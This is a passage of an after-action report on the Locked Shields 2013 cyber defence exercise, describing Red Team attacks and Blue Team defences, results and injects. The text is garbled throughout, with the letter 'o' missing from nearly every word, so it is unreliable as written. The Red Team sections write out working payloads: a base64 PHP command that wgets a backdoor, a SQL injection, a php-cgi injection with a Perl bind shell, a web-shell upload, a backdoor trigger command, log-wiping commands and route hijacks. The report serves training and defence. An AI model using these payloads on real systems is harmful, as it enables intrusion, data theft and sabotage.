22 BT6 at 12:40Z n Day 2 BT7 at 13:24Z n Day 2 (Game was stpped n 13:30Z) The secnd piece f malware was designed t wake up at 09:00Z n Day 2. The initial requests came again frm all Blue Team netwrks: BT1: , , BT2: , , , BT3: , , , BT4: , , , BT5: BT6: , , BT7: , , BT8: , , , BT9: , , , BT10: There is again ne cnsiderable exceptin - BT5. Frm their wrkstatins the malware was cntacting C&C servers fr nly 13 minutes and after that there are n further requests recrded in ur http.lg. Fr reasns unknwn t us, the malware als stpped beacning fr sme ther teams. Last requests twards C&C frm these teams were seen as fllws: BT7 at 12:19Z BT8 and BT10 at 12:32Z BT9 at 13:21Z The backdr planted int ther Blue Teams' netwrks was calling back frm the start until the end f the game. The interesting aspect f this is that the Green Team had made a majr mistake and left the malware installatin files tgether with a readme n the wrkstatins in a flder named C:\cntext flder\installer_d2_quiet. BT5 fund this befre the Gamenet was pened n Day 1 and infrmed ther teams abut this threat as well but, accrding t ur bservatins, nly 30 minutes befre the end f the exercise (at 13:00Z n Day 2 n ls13blue chat channel): TO ALL BTs: Make sure yu search fr the fllwing dlls n yur windws wrkstatins: cpy TaurusDll.dll c:\windws cpy TaurusDll.dll c:\windws\system32\winusb32.dll cpy TaurusDll.dll c:\windws\system32\wintrust32.dll Althugh this malicius cde itself went under the radar f mst f the teams, Red Team culd nt turn it effectively int a real remte access tl. The reasn was again AV. CS team generated an executable with a Meterpreter paylad and cmmanded the malware t dwnlad and execute it. It was detected either during the dwnlad r executin phase. It is still clear that it was t challenging fr the Blue Teams t prperly identify, blck r eradicate that custm threat. If the Red Team had built mre lgic int the cde t allw prper cmmand and cntrl, the attacks wuld have been much mre successful. 22

23 4.5 WEB Team Phase I Objectives The WEB team started the exercise by targeting web applicatins and database servers in Aid_DMZ segment. Their bjectives fr the first phase were: O1: Deface a web site (cunting.aidx.ex) O3: Change bank accunt number fr dnatins ( O4: Steal the vlunteer database (db.aidx.ex) Targets The security psture f the systems running web applicatins is best cmpared with the gd ld Swiss cheese - it was full f hles. Belw we describe the functinality and main vulnerabilities fr the phase I targets: cunting.aidx.ex was a DkuWiki based web site used by Aid rganisatin wrkers fr cunting dead bdies It was pssible t read the surce cde, trigger DS r even execute arbitrary cde by expliting CVE An ICMP based rt shell backdr as well as PHP shell (/bdycunt/lib/images/media.php.png) were pre-planted. was a custm PHP-based web prtal fr sharing infrmatin with the general public, crdinating dnatins, cllecting applicatins frm vlunteers, etc. The secnd functin was an FTP server t enable the Aid wrkers t share large files. Basically, it was built breaking all the rules f secure prgramming: The PrFTP 1.3.3e was built with same backdr that was discvered frm 1.3.3c. Sending the server a cmmand HELP BLUETEAMSSUCK gave a rt shell. Server ran a custm cmpiled lder versin f PHP (5.3.1). Input and utput were nt validated leading t SQLi, XSS, CSRF, etc vulnerabilities. Page navigatin system and PHP cnfiguratin allwed remte file inclusin. File uplads were nt prtected. PHP backdr named Hkwrm was left behind. db.aidx.ex served as a MySQL database server fr the web applicatins and NFS file server. NFS was really badly cnfigured, the shares were pen t the wrld, and rt_quash was turned ff. It wuld have been pssible t get a shell n that hst by, fr example, writing a SSH key under the user accunt f admin using pen NFS shares. The passwrd fr MySQL rt user was bviusly rt. An lder versin f phpmyadmin with remte cde executin vulnerability (CVS ) was deplyed t the system Attack Methds The vulnerabilities f the targets pretty much defined what kinds f techniques were pssible. Nt all the vulnerabilities were explited. Red Team members had access t the dcumentatin f the systems, but it was nt pssible t assimilate all that infrmatin withut spending time n preparatins. Attacking issues such as XSS and CSRF were nt practised as it wuld have required actins frm the applicatin users. Examples f web attacks: 23

24 1. Sme backdrs were fund during the preparatin days, and sme were mre effective. Fr instance, the backdr in PrFTPD running n was successfully used against 6 teams fr the secnd phase defacements. Then it was discvered and the binary had been replaced. 2. PHP prtcl wrappers became useful when expliting file inclusin vulnerabilities. Cnsider the fllwing request sent t /index.php?cmd=ls%20- la&page=data:text/plain;base64,pd9wahagc3lzdgvtkcdtdiavdmfyl 3d3dy9hcHAvdGVtcGxhdGVzL2RvbmF0ZS50cGwgL3RtcC9hc2QudHBsOyB3Z2V0IC1xIDEwLjAuMT kxljgwl2jhy2tkb29ycy9kb25hdguudhh0ic1pic92yxivd3d3l2fwcc90zw1wbgf0zxmvzg9uyxr llnrwbdsgcm0gl3zhci93d3cvyxbwl3rlbxbsyxrlc19jlypkb25hdguudhbslnbcdsnktsgpz4% 3D When the Base64 encded string is decded we get: <?php system('mv /var/www/app/templates/dnate.tpl /tmp/asd.tpl; wget -q /backdrs/dnate.txt -O /var/www/app/templates/dnate.tpl; rm /var/www/app/templates_c/*dnate.tpl.php;');?> 3. SQL injectin was a cmmn vectr t steal data. Example f a GET request sent t /index.php?page=water_sanitisatin&resurce_id=0 unin select 1,2,3,4,(select grup_cncat(cncat(id,char(124),firstname,char(124),lastname,char(124),char( 124),gender,char(124),char(124), ,char(124),bld_type,char(124),cde) separatr 0x3b0a) frm # 4. POST request sent t cunting.aidx.ex in an attempt t use Metasplit mdule named php_cgi_arg_injectin: /?--define+allw_url_include%3don+-%64+safe_mde%3d0+- %64+suhsin.simulatin%3dN+-%64+disable_functins%3d%22%22+-- define+pen_basedir%3dnne+--define+aut_prepend_file%3dphp://input+-n++ The base64 decded paylad that was in POST requests bdy: perl -MIO -e '$p=frk();exit,if$p;$c=new IO::Scket::INET(LcalPrt,4445,Reuse,1,Listen)->accept;$~- >fdpen($c,w);stdin->fdpen($c,r);system$_ while<>' 5. DkuWiki usernames and hashed passwrds culd be btained frm file users.auth.php. The vulnerability in PHP installed n cunting.aidx.ex allwed attackers t read the surce f the files and therefre t btain the credentials: [24/Apr/2013:10:40: ] GET /bdycunt/cnf/users.auth.php?-sdlgin&aid-admin HTTP/ Hst: cunting.aid4.ex 6. Unprtected file uplads prvided an easy way t uplad web shell and execute arbitrary cde. See fr instance the TV twer attack: POST /uplads/ws.php_1.php HTTP/1.1 Hst: tv.mil4.ex User-Agent: Mzilla/5.0 (X11; Linux i686; rv:18.0) Geck/ Firefx/18.0 Iceweasel/

25 ... a=cnsle&c=/var/www/uplads/&p1=wget /files/1.mp4&p2=&p3=&charset=UTF Results Results f the attacks were as fllws: Defacement f cunting.aidx.ex: first rund was successful against 7 teams. Accrding t the Red Team reprts nly BT2 actually fixed the vulnerability: BT2: vulnerabilities fixed! gd jb! BT4: hst cnnectin timed ut BT5: functinality des nt wrk Changing the bank accunt number fr dnatins n first rund was successful against 6 teams. Based n the Red Team reprts, nly BT8 and BT9 mitigated the attack. BT5 had availability issues due t a Green Team fault at the beginning f phase I: BT5: Mst f time nt available BT6: Functinality skipped, ften nt available BT8: Failure BT9: Changed access t files that the attack tried t change Additinal issues faced with were that sme features were added after the Blue Team preparatin days. The rules did nt state that these kind f changes were nt allwed r wuld nt be dne. Still, the changes shuld have been cmmunicated t the Blue Teams. Sme had dwnladed the surce cde during the preparatin days, secured it, and as sn as the exercise started they upladed their wn versin f the applicatin. That versin was missing the mdificatins dne by the Green Team after prep-days. This created an unfair situatin as ther Blue Teams had t prtect systems with mre functinality and mre vulnerabilities. Cnsequently, the White Team rdered thse teams t restre the functinality and finally had t revert sme f the VMs. Stealing the vlunteer database frm db.aidx.ex: first rund was successful against 7 teams. This bjective was never achieved against BT2 and BT4. We d nt have data t make final cnclusins, but a lk at the availability scre reflects that prbably Red Team members culd nt access the vulnerable service fr these teams. During the first rund there was als n access t the BT6 database server. BT2: n access (Availability fr HTTP service n db.aid2.ex 0%, MySQL 94%) BT4: n access (Availability fr HTTP service n db.aid4.ex 14%, MySQL 27%) BT6: n access (HTTP 61%, MySQL 35%) Nte that stealing the vlunteer database culd als have been achieved thrugh the web applicatin running n Phase II Objectives O8: Insert malicius cde t MIL public website in rder t initiate watering hle attack and infect MIL_INT and MIL_WEL wrkstatins ( 25

26 Targets The secnd phase f Red Team campaign defined ne new target fr the WEB team: This was a WrdPress website t cver the activities f the military units deplyed in Blea. The system had the fllwing main security issues initially: The perating system was based n an un-patched Linux kernel versin which led t privilege escalatin. Web applicatin was based n WrdPress CMS with several ut-dated plug-ins: Advanced Custm Fields (Remte File Inclusin). Website FAQ versin 1.0 (SQL injectin). Custm Cntent Type Manager (File Uplad). Backdr allwing PHP cde executin in a rgue file called wp-save.php (fllwing cnstructs in ). Backdr created with Cymtha tl which peridically tried t cnnect t prt 80 n specific IPs and spawn a shell. Nte that the Blue Teams were nt allwed t patch this system but had t rely n ther security measures Results The first rund f the attack was successful against 6 teams; BT4, BT5, BT6 and BT8 prevented it. The secnd rund was successful nly against 3 teams; BT3, BT7, BT10. The WEB team als cntinued t pressure the Blue Teams in Aid_DMZ t repeat sme f the phase I bjectives: Defacement n Aid_DMZ was accmplished against every Blue Team: cunting.aidx.ex was defaced fr 4 teams. was defaced fr 6 teams. Vlunteer database n db.aidx.ex was (re-)stlen frm 6 teams: BT1, BT5, BT7, BT8, BT9 and BT10. The nly significant difference is that this time the attack against BT3 failed Phase III Objectives O13: Insert fake rders in Aid persnnel tasking system leading them t an ambush (help.aidx.ex). O14: Gain and maintain access t the DNS servers (dns.aidx.ex) Targets The new target fr the 3rd phase was help.aidx.ex. The applicatin was implemented in Java and as usual cntained a lt f vulnerabilities: SQLi in almst every pssible place. Vertical user access vulnerabilities (direct links t /list_users /list_tickets /list_request /ticket wrk withut lgging in). 26

27 Stred XSS (paylad culd have been inserted int the help requests). MS SQL running with easy t guess credentials Results The help request system was cmprmised fr BT1, BT2, BT3, BT7 and BT10. The Red Team reprted the fllwing reasns why they failed fr the ther teams: BT4: vulnerability nt fixed but applicatin des nt wrk! BT5: vulnerability nt fixed but applicatin des nt wrk but gives user wrng infrmatin and making impressin like it wrks BT6: vulnerability fixed BT8: vulnerability fixed BT9: Web server is dwn! (Overall availability 11%) Phase IV Objectives There were n new bjectives fr the WEB team fr the last phase. The gal was just t repeat previus bjectives Results The vlunteer database n db.aidx.ex f 6 teams (BT1, BT3, BT5, BT6, BT7, BT10) was still accessible. This time the Red Team deleted the database and changed the passwrds where pssible. Interestingly, during the final phase many f these attacks were cnducted just by accessing the MySQL database with username rt and passwrd rt. The cunting.aidx.ex remained als t challenging t secure. The web pages f 6 teams (BT2, BT3, BT6, BT7, BT9, BT10) were defaced again. 4.6 Netwrk and Mixed Team In this sectin we describe the ffensive activities mainly related with netwrk services and netwrk prtcls. In general, LS13 had lw emphasis n netwrk layer attacks. This was nt intentinal, but there were just n Red Team members with gd netwrk pen-testing skills cmmitted during the planning prcess. During Executin, there were als nly a few peple in NET team, and sme f the bjectives cvered in the fllwing areas were actually assigned t WEB team members Phase I Objectives An additinal gal fr the WEB team was O2: Destry chat server (chat.aidx.ex). 27

28 Targets An IRC-based chat server (chat.aidx.ex) was a less imprtant target in Aid_DMZ as n real cmmunicatin was simulated n it. It was running a trjaned UnrealIRCd daemn (CVE ) and this was the nly vulnerability knwn t us Results The attack succeeded against nly ne team. Others had either secured the service r it was nt available during the attack timeframe: Cmprmised: BT2 Service unavailable/filtered: BT4, BT6, BT7, BT10 Patched: BT1, BT3, BT5, BT8, BT Phase II Objectives Secnd phase bjective was t hack int the mail servers: O9: Cmprmise mail server in MIL_DMZ and steal specific s (mail.milx.ex) O10: Cmprmise mail server in Aid_DMZ and steal specific s (mail.aidx.ex) Targets Mail servers in bth MIL and Aid side were based n the same image. It was a Linux system running Pstfix SMTP daemn. Mailbxes had t be accessible ver POP3s, IMAPs, HTTP and HTTPS. Vulnerabilities were: Remte arbitrary cmmand injectin in SpamAssassin Milter Plug-in (CVE ). Pre-planted backdr spawning a shell n receiving specific HTTP requests. Malicius SUID binary prviding rt shell Results Using the explit against the Milter Plug-in wrked bth in MIL_DMZ and Aid_DMZ fr 4 teams: BT2, BT3, BT4, BT9. Mst f the Blue Teams either had the service patched, a wrkarund (remving OPTIONS= -x frm /etc/default/spamass-milter) in place, r ther cuntermeasures applied. We d nt knw the status f BT6 as their SMTP service seemed t be filtered: verall availability f SMTP n mail.aid6.ex was 73%, verall availability f SMTP n mail.mil6.ex was 0% Phase III Objectives In the mrning f Day 2 the DNS servers came under attack. The gal was simply t gain access: O14: Gain and maintain access t the DNS servers (dns.aidx.ex, dns.milx.ex) Mre interesting scenaris such as pisning the DNS server f the ISP with lng-living recrds t cause denial r hijacking f services were nt played ut. In additin, repeated attacks against the mail server were planned. 28

29 Targets Bth dns.milx.ex and dns.aidx.ex were running n Ubuntu Linux and Bind9. The nly knwn vulnerability was inside the bind9 binary itself - it was trjaned. After receiving a particular DNS request, the server was mdified t cnnect t the prt 80 f the requestr and spawn a shell Results The DNS server was cmprmised nly fr BT9. This is quite natural as Blue Teams had a lt f time t discver and replace the trjaned binary. BT1 sent a chat message n ls13blue already at 08:32Z n Day 1 that they have Fund backdr /usr/sbin/named. BT9 had serius cnnectivity issues during the whle f Day 1 and prbably missed it. Mail servers f BT2, BT3 and BT9 were cmprmised again and defaced Phase IV Objectives The fllwing bjective was left as the last actin: O20: Cnduct ruting attack against MIL_DMZ (csr.milx.ex). A BGP rute hijacking attack was planned fr the final hur f the exercise because we did nt want t cause wide-scale cnnectivity issues in the Gamenet befre the very end f the exercise fr tw reasns. Firstly, during the Executin there was nly ne persn in Green Team wh knew the ruting infrastructure. Secndly, we wanted t avid the Red Team lsing their established sessins in Blue Team systems Targets Each Blue Team had ne Cisc CSR 1000v virtual ruter cnnecting their MIL segment with the Simulated Internet. Each ruter was cnnected t 2 ISP ruters which were administered by the Green Team and 2 ruters f ther Blue Teams. BGP was used as the main ruting prtcl. The ruters themselves didn't have any knwn vulnerabilities except weak initial passwrds Results Red Team had cntrl ver ne CSR (f nnexistent BT11) which was cnnected t the ISP ruters (AS number 65011). Abut 50 minutes befre ENDEX Red Team started t annunce prefixes that belnged t the Blue Teams. Fr instance, the fllwing rutes were inserted t hijack subnets frm BT1: ip rute Null0 ip rute Null0 ip rute Null0 ip rute Null0 The Green Team did nt care wh was advertising what kind f rutes. N filters were applied t the Game ISP ruters. Therefre the Blue Teams culd nt d much by themselves. Many teams started t filter ut AS65011 and therefre fixing the ruting tables n their wn ruters, but the ISP ruters remained pisned. Basically, the ptin the Blue Teams had were as fllws: 29

30 Mnitr and understand why their traffic was suddenly gne. Start advertising mre precise rutes. Fr instance, /27 as Red Team was pisning with /26. Althugh we believe this knwledge is trivial fr peple with experience in wide area netwrks, we bserved nly BT8 immediately applying that tactic. 4.7 Pst-Explitatin Making attacks persistent is the natural mve f the bad guys after gaining initial access. As the exercise was shrt, the Red Team did nt always try t stay hidden but smetimes just messed arund inside the targets. Next we will describe sme f the pst-explitatin peratins: 1. CS team. Generally, after initial cmprmise f wrkstatins, determine privileges btained, escalate if pssible and necessary, always install beacns if pssible, then dump hashes, enumerate installed applicatin versins, use the system t pivt and spread further if viable. Whenever an bjective was cmpleted t the required level, evidence was cllected in the frm f data r at least screenshts fr reprting purpses befre marking an attack a success. 2. WEB team Writing web-based backdrs t ther files. Creating new administrative sessins by assigning wn value t sess_sessinid variable in respective file. Reading ut MySQL database credentials t cnnect directly r use phpmyadmin. 3. Misceallaneus Inserting wn SSH keys fr existing user accunts. Deleting lgs and messing with the cmmnly used binaries: mv /bin/ls /bin/sll mv /bin/cat /bin/dg rm /var/lg/*lg rm /etc/apt/surces.list 4.8 Balance f the Attacks Based n the human reprts, we can infer that RT managed t keep their campaign balanced against each Blue Team. Of curse this des nt prvide an indicatin n hw much effrt was put in t achieve specific bjectives against specific teams. 30

31 4.9 Cnclusins 1. Cmpared t the last year's exercise, the CS team was less successful. There are many reasns fr that: Blue Teams tk the exercise much mre seriusly and put cnsiderable effrt int preparatin. The main vulnerabilities were quickly fixed and the systems prtected with wide range f security tls. Mnitring capabilities have significantly imprved. The infrastructure was stable. In 2012, mst Blue Teams did nt prepare their wn VMs r culd nt get them running due t cmplexity and bugs in the virtualisatin platfrm's management sftware. In LS13, 9 ut f 10 teams prepared separate VMs with their wn tls and integrated them int the envirnment. Red Team mainly used the default executable templates and paylads generated with the free versin f Metasplit. AV and IPS systems have n prblem with detecting and blcking this kind f malicius file. 2. As expected, custm backdrs are difficult t find in already infected systems. The custm cde that was pre-planted in sme f the Windws systems was calling t the C&C servers after the end f the game frm 7 teams. 3. The WEB team did see sme prgress frm the Blue side in defending the web applicatins. This time, almst all Blue Teams used Web Applicatin Firewalls (WAF). Still the attacks were very successful and the cmmn vulnerabilities were ften nt fixed. WAFs quite ften brke the functinality f the applicatins. Sme teams als used ther prscribed tactics such as replacing dynamic web pages with static nes. One team blcked access t the web site after the first request, n matter whether it was a legitimate request r nt. 4. NET team had nly ne specific bjective. The number f attacks against netwrk prtcls and infrastructure must be increased t make the event mre interesting. BGP rute hijacking was quickly discvered by many teams but mitigated by nly ne. Further investigatin wuld reveal the reasn fr that utcme. 5. The mdel f establishing the Red Team frm ad-hc vlunteers wh cannt be expected t prepare and practice befrehand is n lnger sufficient t challenge the Blue Teams. We need a mre permanent and better trained team. The members have t knw each ther s skills. Engaging members with advanced capabilities such as being able t evade AV and IPS is a must. 31

32 5 Blue Team Defence Campaign 5.1 Intrductin Blue Teams used standard security practices and sme custm slutins which were beneficial in the cntext f the exercise. We cnsidered the fllwing factrs as the key t success: Preparatin. The amunt f time the Blue Teams spend n preparatins has significantly increased cmpared t previus exercises. Having expertise t secure all cmpnents f the infrastructure. Teams with nly Windws r nly Linux experts culd nt prtect the whle netwrk. There were many web applicatins and having develpers in the team wh culd fix the cde, nt just carry ut virtual patching with web applicatin firewalls, was beneficial. T ften the WAFs brke functinality. Mnitring. Naturally, being able t detect malicius activities in yur netwrk is ne f the mst imprtant capabilities. Teamwrk, cmmunicatin and divisin f rles. The rganisers tried t cause high-stress situatin by flding the teams with tasks. 5.2 Preparatins First infrmatin abut the envirnment was prvided t the Blue Teams 6 weeks befre Executin. In the beginning, the descriptins f the Test Run systems and rules were available. A mre stable versin f the dcumentatin was finalised 2 weeks befre the main run, but we still had t make changes t answer questins and prblems raised by the Blue Teams. On 16 and 17 April the Blue Teams had initial access t the envirnment. Based n feedback, many Blue Teams invested a lt f time in preparatin, between 3 days and 2 weeks. The main activities were the fllwing: Reading the dcumentatin and analysing the scenari. The infrmatin available frm past exercises was als cnsidered useful, particularly the after actin reprt f Lcked Shields 12 and a presentatin given by a member f Baltic Cyber Shield 2010 winning team. Deciding n strategy and creating an actin plan fr executin. Assigning rles. Scanning the systems and identifying and dcumenting vulnerabilities during the initial access days. Writing firewall rules and hardening scripts. The mst successful team met weekly t g thrugh varius attack scenaris. They built their wn VM images and tested them in their wn lab with cntinuus fine tuning. They als created Windws XP and 7 images, taking int accunt the descriptins available in the exercise wiki in rder t explit them and t test their security measures. We received mixed feedback n whether there was enugh time (2+1 days) t access the systems befre the game started. BT8 felt that there shuld be less time s as t make the event mre 32

33 challenging. BT1 respnded that much mre time wuld be needed. Overall respnses have been summarised belw: Mre time required: 4 teams (5 respnders) Current setting is OK: 5 teams (6 respnders) Less time shuld be given: 1 team (4 respnders) 5.3 Cmmn Practices All Blue Teams used well-knwn practices t secure their systems. We have utlined belw the defence methds that were used by several teams. The list is based n feedback and n ur wn bservatins. The tls mentined are fr illustratin; neither the list f methds nr the tls are exhaustive: Scanning and testing wn netwrks Nessus, Acunetix, Armitage. Patching Nte that ne f the winning team's strategies was Dn t patch unless yu really need t. Anti-Virus The list f prducts used by different teams is prvided in sectin 5.7 Scanning was dne thrugh shares (C$) t allw users cntinue wrking. Suspicius files were submitted t malware analysing services such as VirusTtal.cm and ThreatExpert.cm. Netwrk Intrusin Detectin and Preventin Systems (IDS/IPS). Snrt (e.g. was already existing n Endian Firewall and Security Onin). Hst-based IDS. OSSEC. Persnal and perimeter firewalls. System hardening. Applying restrictive GPOs fr white listing, passwrd plicy, firewall, etc. Restricting user rights. Disabling unnecessary accunts and services. TTL security fr BGP. PHP cnfiguratin: magic_qutes_gpc = On (was Off), magic_qutes_runtime = On (was Off), allw_url_include = Off (was On), max_file_uplads = 1 (was 20). CSR ruter cnfiguratin: ACLs including AS Path ACLs, Rute-Maps, Lgin Blck. Restricting the applicatins that culd be run n the systems. AppLcker. Web Applicatin Firewalls. md_security e.g. using OWASP cre rule set. Central lgging and SIEM systems. Splunk. Reinstalling imprtant binaries such as bind9, vsftpd, prftpd. Central mnitring f file changes. audited in Linux. 33

34 5.4 Blcking Access and RBL A very cmmn activity was t blck any IP address which seemed t be a surce f suspicius actins. Detecting malicius traffic was relatively easy as the simulatin system generally failed t create the expected amunt f legitimate traffic. BT4 prepared a Real-Time Blackhle List (RBL) service fr sharing attackers' IP addresses. Each Blue Team culd submit malicius IPs detected by them t the service and dwnlad the full list in different frmats. Each IP had a reputatin scre based n hw many times it was submitted. This service reflected the real-wrld situatin when trusting such third-party blacklists becmes an issue. A few teams sht themselves in the ft as the IP address f scring bts were entered n the list and this caused a lt f failed availability checks. On the ther hand, this incident made the Green Team ntice that the scring bt was using the same IP all the time instead f changing it fr every rund. 5.5 Less Cmmn Practices Sme defence methds were mre unusual. At least we bserved nly few teams using the fllwing: Preparing wn VM t be placed between existing pre-built systems. The mst successful team placed their IPS inline (Pal Alt virtualised firewall running PanOS Release 2) in frnt f the existing external perimeter firewall bth n the Aid and MIL side. BT1 placed their VM between the existing Endian firewall and Aid_DMZ systems t prxy all web requests thrugh it. Remark. The initial rules did nt clearly regulate whether this kind f integratin wuld be supprted by the Green Team. We answered n t BT2 wh requested it first. This required the Green Team t create additinal VLANs and remap netwrk interfaces after the reversins, s we cnsidered it risky. Later the rule was changed but nt cmmunicated back t BT2. 34

35 Develping a patch fr the custm web applicatin ( t sanitise input and remve backdrs (BT8). The fllwing sanitise() functin was defined: functin sanitise($str = "", $pattern = "a-za-z0-9\ õüäöõüäö\- \_(\)šš,žž"){return trim(preg_replace('/[^'.$pattern.']/', '', $str));} And then this was applied t different GET and POST input parameters: $searchstr = sanitise($_post['search']); Anther methd was t apply crrect type casting: $tpic_id = intval($tpic_id); This kind f fix wrked well in the cntext f exercise. The applicability in real-life situatin is mre questinable. E.g. the sanitise functin deletes single qutes frm the input, but what abut pr Mr O'Neal? Using a wrkarund g get rid f the backdr in vsftpd n tv.milx.ex (BT1). BT1 discvered that the vsftpd binary has a backdr that executes classical bindshell (bind, listen, accept, dup 2nd std stream, execute). S they came up with a cntainment cde which blcked the vulnerability by rewriting the excecl call with n-peratin instructins (0x90): ech -ne \x24\x04\xd6\x15\x06\x08\xc7\x04\x24\xd1\x15\x06\x08\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 > /tmp/vsftpd.cntainment cp /usr/sbin/vsftpd /tmp/vsftpd.tmp cp /usr/sbin/vsftpd /usr/sbin/vsftpd.backup dd if=/tmp/vsftpd.cntainment f=/tmp/vsftpd.tmp bs=1 seek=88240 cnv=ntrunc /etc/init.d/vsftpd stp cp /tmp/vsftpd.tmp /usr/sbin/vsftpd /etc/init.d/vsftpd start Using a wrkarund t blck the backdr in UnrealIRCd, BT9 was unable t dwnlad the updated package fr UnrealIRCd. They discvered that the paylad cntains string AB and decided t try ut a wrkarund t blck respective packets. The service check fr the IRC was just a TCP ping, s we are nt aware hw much functinality this brke. Frm RT s perspective, the service appeared as patched : iptables -m string --string AB --alg bm -s /18 -j DROP Installing database specific security slutins such as GreenSQL (BT4). Deplying a central passwrd management system (BT10). Sandbxing applicatins, especially web brwsers (Sandbxie) (BT5). Encrypting cmmunicatin between servers (IPsec) (BT2). Using hsts3d fr traffic visualisatin (BT4). Custm scripts fr mnitring prcess executin and new cnnectins, blcking users, checking fr changes: BT8: 35

36 Using hneypts (BT4, BT8). The prblem with this slutin is that fr LS exercises the Red Team has always used a white-bx apprach; the initial netwrk is cmpletely knwn t the Red Team members, they are interested in attacking specific services, and they d nt have t scan the netwrks fr new targets. It is still pssible t redirect services t different IPs (at least BT4 used this methd) and hpe that the Red Team is using addresses instead f DNS names. There is a rumur that ne bad guy spent mre than an hur in a hneypt befre figuring ut that this was nt the right place t be. Hwever, afterwards n-ne was brave enugh t admit that it was them. 5.6 Questinable r Frbidden Practices The rules fr LS13 were relatively cmplex. Keeping the rules simple is challenging as the Blue Teams always ask very specific questins regarding what they are and are nt allwed t d. At the same time, mre cmplex rules are difficult t enfrce. Many activities cnducted by the Blue Teams were either directly prhibited r n the brderline: Encrypting and passwrd prtecting sensitive files - these cntained in fact the hash values that the Red Team had t btain as a prf f successful attack Frm the users (blndes ) perspectives this meant that they suddenly fund that all their imprtant dcuments have been encrypted by the IT department. Remving functinality r blcking access t the functinality f web applicatins. Fr instance, dynamic pages were replaced with static pages. Autmatic availability checks were simple and did nt catch such mdificatins. Making wrkstatins unusable: Installing 2 different AVs n the same machine s that they cnsume all resurces. Cnstantly scanning the full file system f the wrkstatins with AV. Administratr cnstantly lgged in. Observing the activities f the blndes ver VNC, killing the brwser after the first attempt t dwnlad a file (this wuld be nt pssible in a real-life engagement when ne wuld have t prtect hundreds f wrkstatins instead f just 12). Patching systems that they were nt allwed t patch. Blcking dwnlads f all kind f files including zip cntainers. Blcking the use f Java. Limiting the POST request size s that nly simple transactins were pssible (such as lgin). Blcking access t the websites after first request r after few secnds frm the initial packet exchange. 5.7 Security Sftware n Windws Systems Team Sftware Remarks BT1 Micrsft Security Essentials BT2 Kaspersky Anti-Virus 2013 Malwarebytes Anti-Malware 1.75 Avast Free Antivirus 8.0 (DCs and WS4) 2 different AV prducts n sme VMs BT3 McAfee VirusScan Enterprise 8.8 and?mcafee Agent BT4 ESET Endpint Security

37 BT5 BT6 BT7 BT8 BT9 NSClient++ OSSEC HIDS 2.7 McAfee VirusScan Enterprise 8.8 and McAfee Agent 4.6 Malwarebytes Anti-Malware 1.75 Sandbxie 3.6 ADManager plus 6.0 and Specps Gpupdate Prfessinal 2.1 (n DCs) EMET Micrsft Security Essentials ESET Smart Security 6.0 McAfee VirusScan Enterprise 8.8 and McAfee Agent 4.6 Avast Free Antivirus 8.0 OSSEC HIDS EMET 4.0 beta Micrsft Security Essentials Malwarebytes Anti-Malware 1.75 Snare 4.0 F-Secure Client Security 10.0 EMET 4.0 beta F-Secure Anti-Virus fr Windws Servers Versin 9 BT10 Symantec Endpint Prtectin Clam AntiVirus was typically installed n the Linux wrkstatins. 5.8 Infrmatin Sharing 2 different AV prducts n sme VMs different AV prducts n sme VMs Shared XMPP (Jabber)-based chat was the main cmmunicatin channel fr the Blue Teams. Straight after the game began, ne team started t alert thers t specific vulnerabilities using chat messages. As ther Blue Teams jined t share their finding and cuntermeasures, the channel was quickly verladed. In additin, lt f the messages where t generic and therefre useless t the thers ( we have clsed firewall, lcal users disabled, we discvered a weak passwrd n help.aid5.ex ). As the result, teams were nt able t fllw r use the infrmatin. Backdrs and vulnerabilities that were reprted n chat and fr which in sme cases custm patches had als been shared were still successfully explited by the Red Team many hurs after the infrmatin appeared the first time. Sme findings were reprted several times by different Blue Teams. We wuld have expected that infrmatin f a mre static nature wuld have been placed n a shared wiki. The cllabratin envirnment was already setup by the rganisers s it didn t require any additinal effrt. Blue Teams culd have structured the infrmatin by creating a list f all individual systems fllwed by all fund issues. Links t vulnerability reprts culd have been shared n the chat channel instead f the cntent f the reprts themselves. The teams were under heavy 37

38 pressure and unfrtunately n-ne was willing t put in additinal effrt t initiate better and mre structured data exchange. 5.9 Scres The tp 3 teams in the screbard were: 1. Blue Team 5 Best scre in availability and SLA bnus, incident reprting, and SITREP. A bnus was assigned fr infrmatin sharing. Secnd best in preventing red team attacks and respnding t injects. Did nt use VM reverts. Only team wh placed their wn IPS/firewall inline in frnt f bth MIL and Aid side. Applied prscribed tactics such as replacing dynamic web pages with static nes. 2. Blue Team 8 Best team in respnding t injects (media). Secnd best in writing SITREPs. Otherwise gd availability scre was impacted by using RBL and therefre accidentally blcking the scring bt. Only team wh quickly mitigated BGP hijacking attack. Did nt use VM reverts. 3. Blue Team 2 Secnd best in availability, SLA bnus and awarded a special scre (was cnsidered t be the mst cperative Blue Team). Average results in ther categries BT5 BT8 BT

39 6 Injects 6.1 Scenari Injects Seven s called scenari injects were defined: 1. Fllwing the news. Blue Teams had t publish a link t the Lcked Shields News prtal n ne f their wn web sites. The aim was t emphasise the existence f the prtal and get Blue Teams t fllw the news. 2. Redundant infrastructure. Blue Teams had t cperate with neighburing Blue Teams and cnfigure their MIL-side BGP ruters t prvide transit t each ther. 3. Intel update. Infrmatin prvided t the Blue Teams abut the invlvement f an internatinal hacker grup. 4. Adversary assessment. Blue Teams were requested t write a shrt reprt abut the adversaries behind cyber attacks by answering t questins such as wh are were, hw many there were, hw capable were they, and what was their mtivatin and gals. 5. Mrtar attack n MIL site. Infrmatin t the Blue Teams that a grenade was thrwn int their server rm cntainer f the MIL netwrks resulting in the destructin f TV twer cmputer. The backups were ld. In reality, their VMs were just reverted t the initial vulnerable state. 6. Abuse reprt. Calitin CERT had received an abuse reprt that ne f the Blue Team's websites ( was hsting malware. Blue Teams were tasked t verify this and reprt the results in 30 minutes. Befre this inject went ut, the Red Team tried t cmprmise thse sites and use them t cnduct watering hle attack. Sme Blue Teams reprted abut the malware they had fund even thugh the Red Team culd nt accmplish the task. 7. Adversary assessment. Blue Teams had t prvide an update abut the adversary. The scred injects tgether with best respnses have been cvered mre thrughly in Annex IV: Scenari Injects. 6.2 Media Injects The aim f the media simulatin was t illustrate the exercise with news frm the real wrld and add pressure t the Blue Teams with injects ther than Red Team activities. The media simulatin cell sent each Blue Team abut 2 s and called them nce during each phase. There were a few dynamic activities respnding t Blue Team s and asking further questins. Pressure n the issue f hacking back was nt riginally planned but turned ut t be a gd tpic fr adding stress t the Blue Teams. A ttal f 25 news stries were published in the Lcked Shields News prtal during the exercise. The stries included backgrund infrmatin abut the situatin n the island, reprts n n-ging incidents, 